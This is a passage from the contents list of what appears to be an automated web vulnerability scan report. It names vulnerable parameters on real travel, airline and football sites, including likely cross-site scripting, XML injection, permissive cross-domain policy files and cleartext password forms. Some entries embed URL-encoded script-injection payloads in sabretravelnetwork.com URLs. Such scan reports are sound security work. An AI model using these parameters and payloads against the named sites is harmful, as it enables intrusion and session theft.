4.318. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeDescription parameter]

4.319. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeDescription parameter]

4.320. https://www.hotelplanner.com/Accept/Reserve.cfm [supplierType parameter]

4.321. https://www.hotelplanner.com/Accept/Reserve.cfm [taxRate parameter]

4.322. http://www.hotwire.com/hotel/results.jsp [REST URL parameter 1]

4.323. http://www.igougo.com/WebResource.axd [d parameter]

4.324. http://www.igougo.com/WebResource.axd [name of an arbitrarily supplied request parameter]

4.325. http://www.igougo.com/WebResource.axd [t parameter]

4.326. http://www.igougo.com/traveldeals/ratefinder.aspx [REST URL parameter 1]

4.327. http://www.igougo.com/traveldeals/ratefinder.aspx [SourceID parameter]

4.328. http://www.igougo.com/traveldeals/ratefinder.aspx [SourceID parameter]

4.329. http://www.igougo.com/traveldeals/ratefinder.aspx [TypeID parameter]

4.330. http://www.igougo.com/traveldeals/ratefinder.aspx [adlt parameter]

4.331. http://www.igougo.com/traveldeals/ratefinder.aspx [dest parameter]

4.332. http://www.igougo.com/traveldeals/ratefinder.aspx [end parameter]

4.333. http://www.igougo.com/traveldeals/ratefinder.aspx [end parameter]

4.334. http://www.igougo.com/traveldeals/ratefinder.aspx [endDate parameter]

4.335. http://www.igougo.com/traveldeals/ratefinder.aspx [name of an arbitrarily supplied request parameter]

4.336. http://www.igougo.com/traveldeals/ratefinder.aspx [rm parameter]

4.337. http://www.igougo.com/traveldeals/ratefinder.aspx [strtDate parameter]

4.338. http://www.jscache.com/weimg [itype parameter]

4.339. http://www.luminate.com/widget/v3/53d1ac1014/event/1230a958301-1/taskbar/minimized/ [callback parameter]

4.340. http://www.luminate.com/widget/v3/metadata/ [callback parameter]

4.341. http://www.luminate.com/widget/v3/metadata/ [url parameter]

4.342. http://www.manutd.com/One-United/Login.aspx [redirectPath parameter]

4.343. http://www.manutd.com/Search-Results.aspx [catTxt parameter]

4.344. http://www.manutd.com/Search-Results.aspx [searchText parameter]

4.345. http://www.mufoundation.org/Search.aspx [search parameter]

4.346. http://www.mufoundation.org/Search.aspx [search parameter]

4.347. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

4.348. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

4.349. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

4.350. http://www.orbitz.com/App/SubmitQuickSearch [origin parameter]

4.351. http://www.sabretravelnetwork.com/home [REST URL parameter 1]

4.352. http://www.sabretravelnetwork.com/home [REST URL parameter 1]

4.353. http://www.sabretravelnetwork.com/home/ [REST URL parameter 1]

4.354. http://www.sabretravelnetwork.com/home/ [REST URL parameter 1]

4.355. http://www.sabretravelnetwork.com/home/products_services/product_index/ [REST URL parameter 1]

4.356. http://www.sabretravelnetwork.com/home/products_services/product_index/ [REST URL parameter 1]

4.357. http://www.sabretravelnetwork.com/home/products_services/product_index/ [name of an arbitrarily supplied request parameter]

4.358. http://www.sabretravelnetwork.com/home/products_services/product_index/ [name of an arbitrarily supplied request parameter]

4.359. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [REST URL parameter 1]

4.360. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [REST URL parameter 1]

4.361. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [name of an arbitrarily supplied request parameter]

4.362. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [name of an arbitrarily supplied request parameter]

4.363. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [REST URL parameter 1]

4.364. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [REST URL parameter 1]

4.365. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.366. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.367. http://www.sabretravelnetwork.com/home/search/show_results [REST URL parameter 1]

4.368. http://www.sabretravelnetwork.com/home/search/show_results [REST URL parameter 1]

4.369. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 1]

4.370. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 1]

4.371. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 2]

4.372. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 2]

4.373. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 3]

4.374. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 3]

4.375. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.376. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.377. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 1]

4.378. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 1]

4.379. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 2]

4.380. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 2]

4.381. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 3]

4.382. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 3]

4.383. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 4]

4.384. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 4]

4.385. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 5]

4.386. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 5]

4.387. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.388. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.389. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 1]

4.390. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 1]

4.391. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 2]

4.392. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 2]

4.393. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 3]

4.394. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 3]

4.395. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 4]

4.396. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 4]

4.397. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 5]

4.398. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 5]

4.399. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.400. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.401. http://www.sabretravelnetwork.com/images/home-text.png [REST URL parameter 2]

4.402. http://www.sabretravelnetwork.com/images/home-text.png [REST URL parameter 2]

4.403. http://www.sabretravelnetwork.com/images/home-text.png [name of an arbitrarily supplied request parameter]

4.404. http://www.sabretravelnetwork.com/images/home-text.png [name of an arbitrarily supplied request parameter]

4.405. http://www.travel-ticker.com/Destination/ [bid parameter]

4.406. http://www.travel-ticker.com/Destination/ [sid parameter]

4.407. http://www.travel-ticker.com/altcategory.jsp [bid parameter]

4.408. http://www.travel-ticker.com/altcategory.jsp [categoryName parameter]

4.409. http://www.travelocity.com/popWindow2 [dest parameter]

4.410. http://www.travelocity.com/popWindow2 [fromDate parameter]

4.411. http://www.travelocity.com/popWindow2 [fromMonth parameter]

4.412. http://www.travelocity.com/popWindow2 [fromYear parameter]

4.413. http://www.travelocity.com/popWindow2 [noOfAdults parameter]

4.414. http://www.travelocity.com/popWindow2 [toDate parameter]

4.415. http://www.travelocity.com/popWindow2 [toMonth parameter]

4.416. http://www.travelocity.com/popWindow2 [toYear parameter]

4.417. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js [pubid parameter]

4.418. http://www9.effectivemeasure.net/v4/em_js [ns parameter]

4.419. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [Referer HTTP header]

4.420. http://www.turkishairlines.com/static/css/ui-lightness/jquery-ui-1.8.14.custom.css [Referer HTTP header]

4.421. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.422. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]

4.423. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]

4.424. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]

4.425. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]

4.426. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

4.427. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

4.428. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

4.429. http://www.travelocity.com/ [SID cookie]

4.430. http://www.travelocity.com/ [TVLY_GEO cookie]

4.431. http://www.travelocity.com/472a [SID cookie]

4.432. http://www.travelocity.com/472a [TVLY_GEO cookie]

4.433. http://www.travelocity.com/resolve/default [SID cookie]

4.434. http://www.travelocity.com/resolve/default [TVLY_GEO cookie]

4.435. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js [drft cookie]

5. Flash cross-domain policy

5.1. http://a.collective-media.net/crossdomain.xml

5.2. http://ad-dc2.adtech.de/crossdomain.xml

5.3. http://ad.doubleclick.net/crossdomain.xml

5.4. http://ad.turn.com/crossdomain.xml

5.5. http://ad4.liverail.com/crossdomain.xml

5.6. http://ads.pointroll.com/crossdomain.xml

5.7. http://adserver.adtech.de/crossdomain.xml

5.8. http://aka-cdn-ns.adtech.de/crossdomain.xml

5.9. http://aperture.displaymarketplace.com/crossdomain.xml

5.10. http://b.scorecardresearch.com/crossdomain.xml

5.11. http://bcp.crwdcntrl.net/crossdomain.xml

5.12. http://beacon.securestudies.com/crossdomain.xml

5.13. http://c.betrad.com/crossdomain.xml

5.14. http://cacheserve.williamhill.com/crossdomain.xml

5.15. http://cas.criteo.com/crossdomain.xml

5.16. http://cdn.flashtalking.com/crossdomain.xml

5.17. http://cdn.turn.com/crossdomain.xml

5.18. http://d.tradex.openx.com/crossdomain.xml

5.19. http://dev.virtualearth.net/crossdomain.xml

5.20. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

5.21. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

5.22. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

5.23. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

5.24. http://ehg-twi.hitbox.com/crossdomain.xml

5.25. http://ff.connextra.com/crossdomain.xml

5.26. http://hits.guardian.co.uk/crossdomain.xml

5.27. http://ib.adnxs.com/crossdomain.xml

5.28. http://idpix.media6degrees.com/crossdomain.xml

5.29. http://js.revsci.net/crossdomain.xml

5.30. http://kantarmedia.guardian.co.uk/crossdomain.xml

5.31. http://l.betrad.com/crossdomain.xml

5.32. http://m.xp1.ru4.com/crossdomain.xml

5.33. http://media.fastclick.net/crossdomain.xml

5.34. http://oas.guardian.co.uk/crossdomain.xml

5.35. http://openx.px.invitemedia.com/crossdomain.xml

5.36. http://panel.kantarmedia.com/crossdomain.xml

5.37. http://pix04.revsci.net/crossdomain.xml

5.38. http://pixel.quantserve.com/crossdomain.xml

5.39. http://premiumtv.122.2o7.net/crossdomain.xml

5.40. http://r.turn.com/crossdomain.xml

5.41. http://rs.gwallet.com/crossdomain.xml

5.42. http://s0.2mdn.net/crossdomain.xml

5.43. http://secure-uk.imrworldwide.com/crossdomain.xml

5.44. https://secure.mlb.com/crossdomain.xml

5.45. http://serve.williamhill.com/crossdomain.xml

5.46. http://servedby.flashtalking.com/crossdomain.xml

5.47. http://speed.pointroll.com/crossdomain.xml

5.48. http://stat.flashtalking.com/crossdomain.xml

5.49. http://sync.mathtag.com/crossdomain.xml

5.50. http://tags.bluekai.com/crossdomain.xml

5.51. http://vox-static.liverail.com/crossdomain.xml

5.52. http://www.luminate.com/crossdomain.xml

5.53. http://www.manutd.com/crossdomain.xml

5.54. http://www.premierleague.com/crossdomain.xml

5.55. http://www9.effectivemeasure.net/crossdomain.xml

5.56. http://xml.eplayer.performgroup.com/crossdomain.xml

5.57. http://xml.premierleague.com/crossdomain.xml

5.58. http://adadvisor.net/crossdomain.xml

5.59. http://cookex.amp.yahoo.com/crossdomain.xml

5.60. http://googleads.g.doubleclick.net/crossdomain.xml

5.61. http://optimized-by.rubiconproject.com/crossdomain.xml

5.62. http://resource.guim.co.uk/crossdomain.xml

5.63. http://www.goal.com/crossdomain.xml

5.64. http://www.guardian.co.uk/crossdomain.xml

5.65. http://matcher-cwb.bidder7.mookie1.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad4.liverail.com/clientaccesspolicy.xml

6.3. http://ads.pointroll.com/clientaccesspolicy.xml

6.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.5. http://beacon.securestudies.com/clientaccesspolicy.xml

6.6. http://dev.virtualearth.net/clientaccesspolicy.xml

6.7. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

6.8. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

6.9. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

6.10. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

6.11. http://hits.guardian.co.uk/clientaccesspolicy.xml

6.12. http://pixel.quantserve.com/clientaccesspolicy.xml

6.13. http://premiumtv.122.2o7.net/clientaccesspolicy.xml

6.14. http://s0.2mdn.net/clientaccesspolicy.xml

6.15. http://secure-uk.imrworldwide.com/clientaccesspolicy.xml

6.16. http://speed.pointroll.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

7.2. http://www.hotelplanner.com/Search/Index.cfm

7.3. http://www.manutd.com/

7.4. http://www.manutd.com/One-United/Login.aspx

7.5. http://www.manutd.com/One-United/Login.aspx

7.6. http://www.manutd.com/Search-Results.aspx

7.7. http://www.manutd.com/en.aspx

7.8. http://www.manutd.com/en/Club/Sponsors.aspx

7.9. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx

7.10. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

7.11. http://www.manutd.com/en/One-United.aspx

7.12. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

8. XML injection

8.1. http://ak-static.hotwirestatic.com/static/deploy/ [REST URL parameter 1]

8.2. http://ak-static.hotwirestatic.com/static/deploy/ [REST URL parameter 2]

8.3. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 1]

8.4. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 2]

8.5. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 3]

8.6. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 4]

8.7. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 1]

8.8. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 2]

8.9. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 3]

8.10. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 4]

8.11. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 5]

8.12. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 1]

8.13. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 2]

8.14. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 3]

8.15. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 4]

8.16. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 5]

8.17. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 6]

8.18. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 1]

8.19. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 2]

8.20. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 3]

8.21. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 4]

8.22. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 5]

8.23. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 6]

8.24. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 1]

8.25. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 2]

8.26. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 3]

8.27. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 4]

8.28. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 5]

8.29. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 1]

8.30. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 2]

8.31. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 3]

8.32. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 4]

8.33. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 5]

8.34. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 6]

8.35. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 1]

8.36. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 2]

8.37. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 3]

8.38. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 4]

8.39. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 5]

8.40. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 6]

8.41. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 1]

8.42. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 2]

8.43. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 3]

8.44. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 4]

8.45. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 1]

8.46. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 2]

8.47. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 3]

8.48. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 4]

8.49. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 1]

8.50. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 2]

8.51. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 3]

8.52. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 4]

8.53. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 1]

8.54. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 2]

8.55. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 3]

8.56. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 4]

8.57. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 5]

8.58. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 1]

8.59. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 2]

8.60. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 3]

8.61. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 4]

8.62. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 5]

8.63. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 1]

8.64. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 2]

8.65. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 3]

8.66. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 4]

8.67. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 1]

8.68. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 2]

8.69. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 3]

8.70. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 4]

8.71. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 5]

8.72. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 1]

8.73. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 2]

8.74. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 3]

8.75. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 4]

8.76. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 5]

8.77. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 1]

8.78. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 2]

8.79. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 3]

8.80. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 4]

8.81. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 5]

8.82. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 1]

8.83. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 2]

8.84. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 3]

8.85. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 4]

8.86. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 5]

8.87. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 1]

8.88. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 2]

8.89. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 3]

8.90. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 4]

8.91. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 5]

8.92. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 1]

8.93. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 2]

8.94. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 3]

8.95. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 4]

8.96. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 5]

8.97. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 1]

8.98. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 2]

8.99. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 3]

8.100. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 4]

8.101. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 5]

8.102. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 1]

8.103. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 2]

8.104. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 3]

8.105. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 4]

8.106. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 5]

